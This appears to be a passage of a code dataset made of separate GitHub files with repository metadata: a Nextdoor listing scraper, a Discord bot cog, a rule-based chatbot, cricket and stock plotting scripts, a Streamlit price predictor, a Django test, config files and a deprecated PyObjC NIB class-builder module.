r\"(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\\\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\\\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])\"\r\n\r\n# Possible SMS gateways\r\ndomains = ['sms.alltelwireless.com', 'txt.att.net', 'sms.myboostmobile.com', 'mms.cricketwireless.net', 'txt.att.net',\r\n 'msg.fi.google.com', 'mymetropcs.com', 'textrepublicwireless.com', 'messaging.sprintpcs.com', 'tmomail.net',\r\n 'email.uscc.net', 'vtext.com', 'vmobl.com']\r\n\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(level=logging.WARN, format=f'{d}%(asctime)s - %(name)s - %(levelname)s - %(message)s{r}',\r\n datefmt='%m/%d/%Y %H:%M:%S')\r\n\r\nemail, password, carr, num = '', '', '', 0\r\n\r\n\r\n# Make sure input read 
in from secrets.txt is valid\r\ndef validate_input(param, mode):\r\n if mode == 0: # Check phone number\r\n try:\r\n if len(param.strip()) != 10:\r\n raise ValueError\r\n param = int(param)\r\n except ValueError:\r\n logging.fatal('Invalid phone number in secrets.txt.')\r\n exit(1)\r\n elif mode == 1: # Check carrier\r\n if not any(carrier.lower() in param.strip().lower() for carrier in valid):\r\n logging.fatal('Invalid carrier in secrets.txt.')\r\n exit(1)\r\n elif mode == 2: # Check email\r\n if re.fullmatch(email_regex, email.strip()) is None or len(email) == 0 or len(email.split('@')[0]) > 64 or \\\r\n len(email.split('@')[1]) > 255:\r\n logging.fatal('Invalid email in secrets.txt.')\r\n exit(1)\r\n\r\n\r\nflag = input('Use secrets file? (Y/N/help) ')\r\nuse_secret = False\r\nwhile True:\r\n if flag == 'help':\r\n print(f\"\"\"{yb}Whether or not you are reading in variables from a file called \"secrets.txt\". If true, the file \r\n will need to look like this, with one element per line:\r\n {bl}phone number (in the form 9995554444)\r\n phone carrier{yb} (must be a valid carrier. if unsure, do not use a secrets file){bl}\r\n email\r\n password{r}\"\"\")\r\n flag = input('Use secrets file? (Y/N/help) ')\r\n elif flag.upper() == 'Y':\r\n use_secret = True\r\n break\r\n elif flag.upper() == 'N':\r\n use_secret = False\r\n break\r\n else:\r\n print(f'{y}Invalid input.{r}')\r\n flag = input('Use secrets file? (Y/N/help) ')\r\n\r\nvalid_lower = [x.lower() for x in valid]\r\n# User is not using a secrets file - get input from command line, make sure it is valid\r\nif not use_secret:\r\n # Phone number\r\n num = input(f'Enter phone number: {bl}(in the form 9995554444){r}: ')\r\n while True:\r\n try:\r\n if len(num) != 10:\r\n raise ValueError\r\n num = int(num)\r\n break\r\n except ValueError as e:\r\n print(f'{y}Please enter a valid number.{r}')\r\n num = input(f'Enter phone number: {bl}(in the form 9995554444){r}: ')\r\n\r\n carr = input('What phone provider do you have? Enter \"help\" to see a list of valid carriers: ')\r\n\r\n # Phone carrier\r\n while True:\r\n if not carr.lower() in valid_lower and carr != 'help':\r\n print(f'{y}Please enter a valid carrier.{r}')\r\n carr = input('What phone provider do you have? Enter \"help\" to see a list of valid carriers: ')\r\n elif carr == 'help':\r\n print(valid)\r\n print(f\"{yb}Carrier not listed? Create an issue at \"\r\n \"https://github.com/TheMinecraftOverlordYT/NextdoorScraper/issues and I'll add support for it \"\r\n f\"in a future update.{r}\")\r\n carr = input('What phone provider do you have? Enter \"help\" to see a list of valid carriers: ')\r\n else:\r\n break\r\n\r\n # Email\r\n email = input('Please enter the email you use to log into Nextdoor: ')\r\n while True:\r\n if re.fullmatch(email_regex, email) is None or len(email) == 0 or len(email.split('@')[0]) > 64 or \\\r\n len(email.split('@')[1]) > 255:\r\n print(f'{y}Please enter a valid email.{r}')\r\n email = input('Please enter the email you use to log into Nextdoor: ')\r\n else:\r\n break\r\n\r\n # Password\r\n password = getpass.getpass(prompt='Please enter your password: ')\r\n\r\n# Read in from secrets file, validate input\r\nelse:\r\n secrets_file = input('Please enter the path to your secrets file, or enter \"help\": ')\r\n while True:\r\n if secrets_file == 'help':\r\n print(f\"{yb}Please enter the path pointing to your secrets file. 
An example path might look something \"\r\n f\"like{bl}\\n \"\r\n r\"C:\\Users\\John\\Desktop\\NextdoorScraper\\secrets.txt.\"\r\n f\"{yb} The file should end in '.txt'.\"\r\n f\"{r}\")\r\n secrets_file = input('Please enter the path to your secrets file, or enter \"help\": ')\r\n elif not os.path.isfile(secrets_file) or not secrets_file[-4:] == '.txt':\r\n print(f'{y}Invalid path.{r}')\r\n secrets_file = input('Please enter the path to your secrets file, or enter \"help\": ')\r\n else:\r\n break\r\n\r\n try:\r\n with open(secrets_file, 'r') as secrets:\r\n num = secrets.readline()\r\n carr = secrets.readline().strip()\r\n email = secrets.readline()\r\n password = secrets.readline()\r\n validate_input(num, 0)\r\n validate_input(carr, 1)\r\n validate_input(email, 2)\r\n except IOError:\r\n logging.fatal('There was an error opening secrets.txt. Make sure the path is correct and you '\r\n 'have appropriate permissions.')\r\n traceback.print_exc()\r\n exit(1)\r\n\r\ndomain = domains[valid_lower.index(carr)]\r\ndriver_path = input('Please enter the path to your web driver: ')\r\n\r\nwhile True:\r\n if len(driver_path.strip()) == 0:\r\n break\r\n if not os.path.isfile(driver_path.strip()) or driver_path.strip()[-4:] != '.exe':\r\n print('Please enter a valid path.')\r\n driver_path = input('Please enter the path to your web driver: ')\r\n else:\r\n break\r\n\r\nsearch_terms = input('[Optional] What terms would you like to be notified of? Enter values separated by a comma: ')\r\nsearch_terms = search_terms.split(',')\r\n\r\nif len(search_terms) == 0:\r\n scraper.load_terms()\r\nelse:\r\n scraper.load_terms(search_terms)\r\n\r\ndb_path = input('Please enter the full path to where you would like your database file to be stored, or \"help\": ')\r\nwhile True:\r\n if db_path == 'help':\r\n print(f'{yb}Please enter a path pointing to where you want your database to be stored. An example might look '\r\n f'like {bl}\\n' r'C:\\Users\\John\\Desktop\\NextDoorScraper\\db.json''.\\n'f'{yb}The path should end '\r\n f'with {bl}.json{yb}. 
This file will keep track of notifications you have gotten so as to not '\r\n f'notify you twice for the same item.{r}')\r\n db_path = input('Please enter the path to where you would like your database file to be stored, or \"help\": ')\r\n # Strip off the file (x.json) then convert back to string and make sure directory is valid.\r\n # This checks that their desired db file would be valid without it actually having to already exist.\r\n elif not os.path.isdir(\"\\\\\".join(db_path.strip().split(\"\\\\\")[:-1])) or not db_path[-5:] == '.json':\r\n print('Please enter a valid path.')\r\n db_path = input('Please enter the path to where you would like your database file to be stored, or \"help\": ')\r\n else:\r\n break\r\n\r\ndriver = None\r\nif len(driver_path) == 0:\r\n driver = navigation.navigate(email, password)\r\nelse:\r\n try:\r\n driver = navigation.navigate(email, password, driver_path)\r\n\r\n except NameError as ex:\r\n logger.fatal('Invalid email or password.')\r\n exit(1)\r\n\r\nscraper.scroll(driver)\r\ndb_manager.init_sms(num, domain, email)\r\n\r\nwhile True:\r\n links, titles = scraper.scrape(driver)\r\n db_manager.load(links, titles, db_path)\r\n time.sleep(random.randrange(180, 300))\r\n driver.refresh()\r\n logger.debug('Page refreshed')\r\n","repo_name":"ketan-ryan/NextdoorScraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40993998935","text":"import discord\nfrom discord.ext import commands\nfrom Cogs.ArmyData import ArmyData\n\nclass Army(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.hybrid_command(name=\"군대\", with_app_command=True)\n async def army(self, ctx: commands.Context, *, member: discord.Member = None):\n \"\"\" 군대 정보를 출력합니다. \"\"\"\n member = member or ctx.author\n await ctx.send(f'{member.mention} 님은 {ArmyData.getInfo(member.id)}')\n\n\nasync def setup(bot): # Cog를 추가하는 코루틴\n await bot.add_cog(Army(bot)) # add the cog to the bot","repo_name":"StraySpeed/ThrillerBot","sub_path":"Cogs/Army.py","file_name":"Army.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33238449094","text":"# importing regex and random libraries\nimport re\nimport random\n\nclass AlienBot:\n # potential negative responses\n negative_responses = (\"no\", \"nope\", \"nah\", \"naw\", \"not a chance\", \"sorry\")\n\n # keywords for exiting the conversation\n exit_commands = (\"quit\", \"pause\", \"exit\", \"goodbye\", \"bye\", \"later\")\n\n # random starter questions\n random_questions = (\n \"Why are you here? \",\n \"Are there many humans like you? \",\n \"What do you consume for sustenance? \",\n \"Is there intelligent life on this planet? \",\n \"Does Earth have a leader? \",\n \"What planets have you visited? \",\n \"What technology do you have on this planet? \"\n )\n\n def __init__(self):\n self.alienbabble = { \n 'answer_why_intent': r'why\\sare.*',\n 'describe_planet_intent': r'tell\\sme\\sabout.*planet.*',\n 'cubed_intent': r'.*cube.*(\\d+).*'\n }\n\n def greet(self):\n self.name = input(\"Hello there! What is your name?\\n\")\n will_help = input(\"Hi {}, I'm ET. I'm not from this planet. 
Will you help me learn about your planet?\\n\".format(self.name))\n if will_help in self.negative_responses:\n return \"Ok, invading it is.\"\n self.chat()\n \n def make_exit(self, reply):\n for words in self.exit_commands:\n if words in reply:\n print(\"Ok. Invading it is.\")\n return -1\n\n def chat(self):\n reply = input(random.choice(self.random_questions)).lower()\n while not self.make_exit(reply):\n reply = input(self.match_reply(reply) + \"\\n\")\n \n\n def match_reply(self, reply):\n for key, value in self.alienbabble.items():\n intent = key\n regex_pattern = value\n found_match = re.match(regex_pattern, reply.lower())\n if found_match and \"describe_planet_intent\" in intent:\n return self.describe_planet_intent()\n elif found_match and \"answer_why_intent\" in intent:\n return self.answer_why_intent()\n elif found_match and \"cubed_intent\" in intent:\n return self.cubed_intent(found_match.group(1))\n else:\n return self.no_match_intent()\n\n def describe_planet_intent(self):\n responses = (\n \"My planet is a utopia of diverse orgamnisms and species. \",\n \"I am from Opidipus, the capital of the Wayward Galaxies. \")\n return random.choice(responses)\n \n\n def answer_why_intent(self):\n responses = (\n \"i come in piece\",\n \"I am here to collect data on your planet and its inhabitants\",\n \"I heard the coffee is good..\")\n return random.choice(responses)\n \n \n def cubed_intent(self, number):\n cubed_number = int(number)**3\n return \"The cube of {} is {}. Isn't that cool?\".format(number, cubed_number)\n\n\n def no_match_intent(self):\n responses = (\n \"Please tell me more.\",\n \"Tell me more!\",\n \"Why do you say that?\",\n \"I see. Can you elaborate?\",\n \"Interesting. Can you tell me more?\",\n \"I see. How do you think?\",\n \"Why?\",\n \"How do you think I feel when you say that?\")\n return random.choice(responses)\n\nET = AlienBot()\nET.greet()\n","repo_name":"And1B/Rule-Based-Chatbot","sub_path":"AlienBot.py","file_name":"AlienBot.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35147152042","text":"\"\"\"\nA quick example that calls the 3D wicket function to plot Moeen Ali's pitch map using the Hawkeye data from\nthe Men's ICC Cricket World Cup 2015 vs Australia on 14-02-2015\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom plots.pitch_densitymap import pitch_densitymap\n\n# Import Moeen Ali data\ndf = pd.read_csv('data/moeen.csv')\n\n# Hawkeye Data has Y co-ord as meters from stumps towards bowler, so need to flip pitchX and stumpsX for plotting\ndf['pitchX'] = -df['pitchX']\ndf['stumpsX'] = -df['stumpsX']\n\n# Filter to balls with tracking enabled\nballs = df[df['pitchY'] > 0]\n\n# Split balls for RHB and LHB and select pitch co-ords\nxy_rh = np.array(balls[balls.rightHandedBat == True][['pitchX', 'pitchY']])\n\ntitle = 'Moeen Ali'\nsubtitle_1 = 'Deliveries to Right-handers'\nsubtitle_2 = 'ICC Cricket World Cup 2015 | vs Australia | 14-02-2015'\n\npitch_densitymap(xy_rh, title=title, subtitle_1=subtitle_1, subtitle_2=subtitle_2)\n","repo_name":"opengoalapp/cricket_tracking","sub_path":"examples/moeen_example.py","file_name":"moeen_example.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41801367554","text":"from pathlib import Path\n\nimport yaml\n\n\nclass ProcessYaml:\n \"\"\"Process Yaml\"\"\"\n\n home = Path.home()\n\n def 
set_path(self, name_file) -> None:\n \"\"\"Get the content of file\"\"\"\n path = f\"{self.home}/Dropbox/kanban2/{name_file}\"\n if Path(path).is_file():\n self.yaml_file = path\n with open(self.yaml_file) as f:\n self.content_file = f.read()\n self.load_yaml()\n else:\n self.content_file = \"\"\n self.json_dir = {}\n\n def load_yaml(self):\n \"\"\"Load yaml file\"\"\"\n self.json_dir = yaml.safe_load(self.content_file)\n\n def __show_home(self):\n \"\"\"Mostrar el path del yaml_file\"\"\"\n print(self.yaml_file)\n\n def show_stages(self):\n \"\"\"Show board's stages\"\"\"\n for stage in self.json_dir[\"stages\"]:\n print(stage)\n\n def stages(self):\n \"\"\"Get the board's stages (columns)\"\"\"\n return self.json_dir[\"stages\"]\n\n\nif __name__ == \"__main__\":\n process = ProcessYaml()\n process.set_path(\"todo.yml\")\n process.show_stages()\n","repo_name":"justafewwords4/kultimate","sub_path":"kultimate/utils/process_yaml.py","file_name":"process_yaml.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40648043417","text":"import os\n\n_basedir = os.path.abspath(os.path.dirname(__file__))\n\n# LOGGING_FORMAT = \"%(asctime)-15s %(clientip)s %(user)-8s %(message)s\"\n# logging.basicConfig(format=FORMAT)\nDEBUG = True\nSECRET_KEY = \"development_key\"\nCACHE_TIMEOUT = 60 * 60 * 15 # Default is 15 minutes\n\n#-- Redis settings\n# REDIS_CLASS = 'redis.Redis' if IS_24 else 'redis.StrictRedis'\nREDIS_HOST = \"localhost\"\nREDIS_PORT = 6379\nREDIS_DB = 0\n\nREDIS_BACKUP_HOST = \"localhost\"\nREDIS_BACKUP_PORT = 6380\nREDIS_BACKUP_DB = 0\n\nREDIS_SLAVE_HOST = \"localhost\"\nREDIS_SLAVE_PORT = 6381\nREDIS_SLAVE_DB = 0\n\n#-- Redis Key Tokens\nREDIS_KEY_TOKEN_SPORT = \"{{sport}}\"\n\n#-- Redis Keys\nREDIS_KEY_TEAMS = REDIS_KEY_TOKEN_SPORT + \"_teams\"\n\n# DICT_KEY_DATA = \"data\"\n# DICT_KEY_META = \"meta\"\n\n# LIST_NAME = 'flask'\n# RSYNC_PATH = 'librelist.com::json/%s'\n# SUBJECT_PREFIX = '[flask]'\n# WHOOSH_INDEX = os.path.join(_basedir, 'flask-website.whoosh')\n# DOCUMENTATION_PATH = os.path.join(_basedir, '../flask/docs/_build/dirhtml')\n\ndel os\n","repo_name":"jkereako/stats-html-scraper-api","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44263702009","text":"import streamlit as st \nimport pandas as pd \nimport numpy as np \nimport joblib \n\ndef run_ml_app():\n\n st.subheader('현재 자산과 상태를 통해')\n st.subheader('적정한 차량금액을 알 수 있습니다.')\n \n st.subheader('Machine Learnig 예측')\n\n # 1. 유저한테, 데이터를 입력 받습니다.\n gender=st.radio('성별을 입력하세요.',['남자','여자'])\n if gender == '남자':\n gender_number = 1\n elif gender =='여자':\n gender_number = 0\n\n age=st.number_input('나이 입력',min_value=1,max_value=100)\n salary=st.number_input('연봉을 입력해주세요',min_value=10000)\n debt=st.number_input('카드 빛 입력',min_value=0)\n worth =st.number_input('자산 입력',min_value=10000)\n\n # print(gender_number,age,salary,debt,worth)\n # 2. 모델에 예측한다.\n # 2-1 신규 데이터를 넘파이로 만든다.\n new_data=np.array([gender_number,age,salary,debt,worth])\n new_data= new_data.reshape(1,5)\n #2-2 스케일러와 인공지능을 변수로 불러온다.\n scaler_X=joblib.load('data/scaler_X.pkl')\n scaler_y=joblib.load('data/scaler_y.pkl')\n regressor=joblib.load('data/regressor.pkl ')\n # 2-3. 신규 데이터를 피쳐 스케일링 한다 .\n new_data=scaler_X.transform(new_data)\n # 2-4. 인공 지능에게 예측을 하게 한다.\n y_pred=regressor.predict(new_data)\n\n #2-5. 
예측한 결과는, 다시 원래대로 복구해 줘야한다.\n # print(y_pred)\n\n y_pred=scaler_y.inverse_transform(y_pred.reshape(1,1))\n\n # print(y_pred)\n # 3. 예측 결과를 웹 대시보드에 표시한다.\n btn=st.button('예측 결과 확인')\n # 결과가 소수점으로 나오는데 , 소수점 뒤 한자리 까지만\n # 나오도록 코드 수정하기.\n\n\n if btn:\n st.subheader('예측 결과!' + ' '+' {0:.1f} 달러의 차를 살수 있습니다,'.format(y_pred[0,0]))\n ","repo_name":"haneul0147/dashboard_car","sub_path":"ml_app.py","file_name":"ml_app.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14478017876","text":"import json\nimport factories\nimport pytest\nfrom django.urls import reverse\nfrom rest_framework import status\n\n\n@pytest.mark.django_db\ndef test_bot_verify(auth_client, user):\n factories.TuserFactory.create(\n tg_chat_id=123445,\n tg_user_id=124315315,\n tg_username='testuser',\n user=user,\n verification_code='correct'\n )\n url = reverse('bot_verify')\n payload1 = {\n 'verification_code': 'correct'\n }\n payload2 = {\n 'verification_code': 'incorrect'\n }\n\n response1 = auth_client.patch(\n path=url,\n data=json.dumps(payload1),\n content_type='application/json',\n )\n response2 = auth_client.patch(\n path=url,\n data=json.dumps(payload2),\n content_type='application/json',\n )\n\n assert response1.status_code == status.HTTP_201_CREATED\n assert response2.status_code == status.HTTP_400_BAD_REQUEST\n\n","repo_name":"alllvp/diploma","sub_path":"todolist/tests/test_bot/test_bot.py","file_name":"test_bot.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5424623900","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport numpy\nimport os\nimport sys\nimport time\n\nif '../public' not in sys.path:\n sys.path.append('../public')\nfrom widget import history_c\nfrom xfilter import xfilter\n\nimport matplotlib.pyplot as plt\n\ndef main():\n history = history_c()\n history.load('../../daily/163/data/dbf/2012.dbf')\n plt.axhline(y=0.0, color='k', alpha=0.2)\n jstr = raw_input().strip()\n task = json.loads(jstr)\n n = len(task['code'])\n for i in xrange(n):\n row = history.kweek(task['code'][i], task['tweek'][i])\n co = 'r'\n if row[0]<1e-6:\n co = 'g'\n li = '-'\n if row[3]<5:\n li = '--'\n plt.plot([i, i], [row[1], row[2]], co+li)\n plt.plot([i], [row[1]], co+',')\n plt.plot([i], [row[2]], co+',')\n plt.plot([i], [row[0]], co+'o')\n #plt.plot([-1, n], [0, 0], '.', alpha=1.0)\n plt.xlim(-1, n)\n plt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"jki14/the-cat-of-wall-street","sub_path":"legacy/weekly/svm-r/kweek.py","file_name":"kweek.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15996388372","text":"import torch.optim\nimport torchvision\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom learning.learn_pytorch.model import *\n\ntrain_data = torchvision.datasets.CIFAR10(\"./dataset\", train=True, transform=torchvision.transforms.ToTensor(),\n download=True)\ntest_data = torchvision.datasets.CIFAR10(\"./dataset\", train=False, transform=torchvision.transforms.ToTensor(),\n download=True)\n\ntrain_data_size = len(train_data)\ntest_data_size = len(test_data)\n\ntrain_dataloader = DataLoader(train_data, batch_size=64)\ntest_dataloader = DataLoader(test_data, batch_size=64)\n\ndm = DM()\n\nloss_fn = nn.CrossEntropyLoss()\n\nlearn_rate = 
1e-2\noptimizer = torch.optim.SGD(dm.parameters(), lr=learn_rate)\n\ntotal_train_step = 0\ntotal_test_step = 0\nepoch = 10\n\nwriter = SummaryWriter(\"../logs_train\")\n\nfor i in range(epoch):\n print(\"第{}轮训练开始\".format(i + 1))\n\n for data in train_dataloader:\n imgs, targets = data\n outputs = dm(imgs)\n loss = loss_fn(outputs, targets)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n total_train_step += 1\n if total_train_step % 100 == 0:\n print(\"训练次数:{},loss:{}\".format(total_train_step, loss.item()))\n writer.add_scalar(\"train_loss\", loss.item(), total_train_step)\n\n total_test_loss = 0\n total_accruracy = 0\n with torch.no_grad():\n for data in test_dataloader:\n imgs, targets = data\n outputs = dm(imgs)\n loss = loss_fn(outputs, targets)\n total_test_loss += loss.item()\n accuracy = (outputs.argmax(1) == targets).sum()\n total_accruracy += accuracy\n print(\"整体测试集上的loss:{}\".format(total_test_loss))\n print(\"整体测试集上的正确率:{}\".format(total_accruracy/test_data_size))\n writer.add_scalar(\"test_loss\", total_test_loss, total_test_step)\n writer.add_scalar(\"test_accuracy\", total_accruracy/test_data_size, total_test_step)\n total_test_step += 1\n\n torch.save(dm, \"dm_{}.pth\".format(i))\n print(\"模型已保存\")\n\nwriter.close()\n","repo_name":"Chancerain/learning","sub_path":"learn_pytorch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7627015584","text":"#!/usr/bin/env python\n\n\"\"\"NibClassBuilder.py -- Tools for working with class definitions in\n\"Next Interface Builder\" files (\"nibs\").\n\nNOTE: This module is deprecated and is not supported with modern versions\nof Interface Builder because those uses a NIB format that is not compatibility\nwith NibClassBuilder. We have no intention whatsoever to fix the compatibility\nissues, use explicit definitions instead. On a more possitive note: IB 3.0\nfully supports reading class definitions from Python files, which removes\nthe reason why we wrote this module in the first place.\n\n\n\n\nExtracting class definitions from nibs.\n\nThe module maintains a global set of class definitions, extracted from\nnibs. To add the classes from a nib to this set, use the extractClasses()\nfunction. It can be called in two ways:\n\n extractClasses(nibName, bundle=<main-bundle>)\n This finds the nib by name from a bundle. If no bundle\n if given, the main bundle is searched.\n\n extractClasses(path=pathToNib)\n This uses an explicit path to a nib.\n\nextractClasses() can be called multiple times for the same bundle: the\nresults are cached so no almost extra overhead is caused.\n\n\nUsing the class definitions.\n\nThe module contains a \"magic\" base (super) class called AutoBaseClass.\nSubclassing AutoBaseClass will invoke some magic that will look up the\nproper base class in the class definitions extracted from the nib(s).\nIf you use multiple inheritance to use Cocoa's \"informal protocols\",\nyou _must_ list AutoBaseClass as the first base class. For example:\n\n class PyModel(AutoBaseClass, NSTableSource):\n ...\n\n\nThe NibInfo class.\n\nThe parsing of nibs and collecting the class definition is done by the\nNibInfo class. You normally don't use it directly, but it's here if you\nhave special needs.\n\n\nThe command line tool.\n\nWhen run from the command line, this module invokes a simple command\nline program, which you feed paths to nibs. 
This will print a Python\ntemplate for all classes defined in the nib(s). For more documentation, see\nthe commandline_doc variable, or simply run the program without\narguments. It also contains a simple test program.\n\"\"\"\n\n#\n# Written by Just van Rossum <just@letterror.com>, borrowing heavily\n# from Ronald Oussoren's classnib.py module, which this module\n# supercedes. Lots of additional input from Bill Bumgarner and Jack\n# Jansen.\n#\n\nimport sys\nimport os\nimport objc\n\nimport warnings\nwarnings.warn(\"PyObjCTools.NibClassBuilder is deprecated, use explicit definitions instead\", DeprecationWarning)\n\n\n__all__ = [\"AutoBaseClass\", \"NibInfo\", \"extractClasses\"]\n\n\nfrom Foundation import NSDictionary, NSObject, NSBundle\nimport AppKit # not used directly, but we look up classes from AppKit\n # dynamically, so it has to be loaded.\n\n\nclass NibLoaderError(Exception): pass\n\n\nclass ClassInfo:\n\n attrNames = (\"nibs\", \"name\", \"super\", \"actions\", \"outlets\")\n\n def __repr__(self):\n items = self.__dict__.items()\n items.sort()\n return self.__class__.__name__ + \"(\" + \\\n \", \".join([ \"%s=%s\"%i for i in items ]) + \")\"\n\n def merge(self, other):\n assert self.name == other.name\n if self.super != other.super:\n raise NibLoaderError(\n \"Incompatible superclass for %s\" % self.name)\n self.nibs = mergeLists(self.nibs, other.nibs)\n self.outlets = mergeLists(self.outlets, other.outlets)\n self.actions = mergeLists(self.actions, other.actions)\n\n def __cmp__(self, other):\n s = [getattr(self, x) for x in self.attrNames]\n o = [getattr(other, x) for x in self.attrNames]\n return cmp(s, o)\n\n\nclass NibInfo(object):\n\n def __init__(self):\n self.classes = {}\n self.parsedNibs = {}\n\n # we implement a subset of the dictionary protocol, for convenience.\n\n def keys(self):\n return self.classes.keys()\n\n def has_key(self, name):\n return self.classes.has_key(name)\n\n def len(self):\n return len(self.classes)\n\n def __iter__(self):\n return iter(self.classes)\n\n def __getitem__(self, name):\n return self.classes[name]\n\n def get(self, name, default=None):\n return self.classes.get(name, default)\n\n def extractClasses(self, nibName=None, bundle=None, path=None):\n \"\"\"Extract the class definitions from a nib.\n\n The nib can be specified by name, in which case it will be\n searched in the main bundle (or in the bundle specified), or\n by path.\n \"\"\"\n if path is None:\n self._extractClassesFromNibFromBundle(nibName, bundle)\n else:\n if nibName is not None or bundle is not None:\n raise ValueError(\"Can't specify 'nibName' or \"\n \"'bundle' when specifying 'path'\")\n self._extractClassesFromNibFromPath(path)\n\n def _extractClassesFromNibFromBundle(self, nibName, bundle=None):\n if not bundle:\n bundle = objc.currentBundle()\n if nibName[-4:] == '.nib':\n resType = None\n else:\n resType = \"nib\"\n path = bundle.pathForResource_ofType_(nibName, resType)\n if not path:\n raise NibLoaderError(\"Could not find nib named '%s' \"\n \"in bundle '%s'\" % (nibName, bundle))\n self._extractClassesFromNibFromPath(path)\n\n def _extractClassesFromNibFromPath(self, path):\n path = os.path.normpath(path)\n if self.parsedNibs.has_key(path):\n return # we've already parsed this nib\n nibName = os.path.basename(path)\n nibInfo = NSDictionary.dictionaryWithContentsOfFile_(\n os.path.join(path, 'classes.nib'))\n if nibInfo is None:\n raise NibLoaderError(\"Invalid NIB file [%s]\" % path)\n if not nibInfo.has_key('IBVersion'):\n raise NibLoaderError(\"Invalid NIB 
info\")\n if nibInfo['IBVersion'] != '1':\n raise NibLoaderError(\"Unsupported NIB version\")\n for rawClsInfo in nibInfo['IBClasses']:\n self._addClass(nibName, rawClsInfo)\n self.parsedNibs[path] = 1\n\n def _addClass(self, nibName, rawClsInfo):\n classes = self.classes\n name = rawClsInfo['CLASS']\n if name == \"FirstResponder\":\n # a FirstResponder never needs to be made\n return\n\n clsInfo = ClassInfo()\n clsInfo.nibs = [nibName] # a class can occur in multiple nibs\n clsInfo.name = name\n clsInfo.super = rawClsInfo.get('SUPERCLASS', 'NSObject')\n clsInfo.actions = [a + \"_\" for a in rawClsInfo.get('ACTIONS', ())]\n clsInfo.outlets = list(rawClsInfo.get('OUTLETS', ()))\n\n if not classes.has_key(name):\n classes[name] = clsInfo\n else:\n classes[name].merge(clsInfo)\n\n def makeClass(self, name, bases, methods):\n \"\"\"Construct a new class using the proper base class, as specified\n in the nib.\n \"\"\"\n clsInfo = self.classes.get(name)\n if clsInfo is None:\n raise NibLoaderError(\"No class named '%s' found in \"\n \"nibs\" % name)\n\n try:\n superClass = objc.lookUpClass(clsInfo.super)\n except objc.nosuchclass_error:\n raise NibLoaderError((\"Superclass '%s' for '%s' not \"\n \"found.\" % (clsInfo.super, name)))\n bases = (superClass,) + bases\n metaClass = superClass.__class__\n\n for o in clsInfo.outlets:\n if not methods.has_key(o):\n methods[o] = objc.IBOutlet(o)\n\n for a in clsInfo.actions:\n if not methods.has_key(a):\n # XXX we could issue warning here!\n pass\n # don't insert a stub as it effectively disables\n # AppKit's own method validation\n #methods[a] = _actionStub\n\n return metaClass(name, bases, methods)\n\n def printTemplate(self, file=None):\n \"\"\"Print a Python template of classes, matching their specification\n in the nib(s).\n \"\"\"\n if file is None:\n file = sys.stdout\n writer = IndentWriter(file)\n self._printTemplateHeader(writer)\n\n classes = self.classes.values()\n classes.sort() # see ClassInfo.__cmp__\n for clsInfo in classes:\n if _classExists(clsInfo.super):\n self._printClass(writer, clsInfo)\n else:\n writer.writeln(\"if 0:\")\n writer.indent()\n writer.writeln(\"# *** base class not found: %s\" % clsInfo.super)\n self._printClass(writer, clsInfo)\n writer.dedent()\n\n self._printTemplateFooter(writer)\n\n def _printTemplateHeader(self, writer):\n nibs = {}\n for clsInfo in self.classes.values():\n for nib in clsInfo.nibs:\n nibs[nib] = 1\n\n writer.writeln(\"import objc\")\n writer.writeln(\"from Foundation import *\")\n writer.writeln(\"from AppKit import *\")\n writer.writeln(\"from PyObjCTools import NibClassBuilder, AppHelper\")\n writer.writeln()\n writer.writeln()\n nibs = nibs.keys()\n nibs.sort()\n for nib in nibs:\n assert nib[-4:] == \".nib\"\n nib = nib[:-4]\n writer.writeln(\"NibClassBuilder.extractClasses(\\\"%s\\\")\" % nib)\n writer.writeln()\n writer.writeln()\n\n def _printTemplateFooter(self, writer):\n writer.writeln()\n writer.writeln('if __name__ == \"__main__\":')\n 